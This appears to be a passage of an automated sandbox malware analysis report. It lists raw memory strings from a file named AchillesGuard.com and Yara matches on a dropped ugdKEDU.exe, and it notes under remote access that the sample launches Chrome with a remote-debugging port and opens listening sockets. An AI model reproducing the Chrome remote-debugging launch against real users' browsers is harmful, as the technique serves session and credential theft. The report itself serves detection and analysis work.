Source: AchillesGuard.com, 0000001C.00000002.3528429627.00000000009E3000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: AchillesGuard.com Binary or memory string: WIN_XPe
Source: AchillesGuard.com Binary or memory string: WIN_VISTA
Source: AchillesGuard.com Binary or memory string: WIN_7
Source: AchillesGuard.com Binary or memory string: WIN_8
Source: Yara match File source: Process Memory Space: ugdKEDU.exe PID: 2644, type: MEMORYSTR

Remote Access Functionality

Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: Yara match File source: 31.2.ugdKEDU.exe.3c19550.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.0.ugdKEDU.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000000.2957620541.0000000000892000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ugdKEDU[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe, type: DROPPED
Source: Yara match File source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.ugdKEDU.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.ugdKEDU.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3022168712.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ugdKEDU.exe PID: 1548, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ugdKEDU.exe PID: 2644, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009A2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 28_2_009A2263
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009A1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 28_2_009A1C61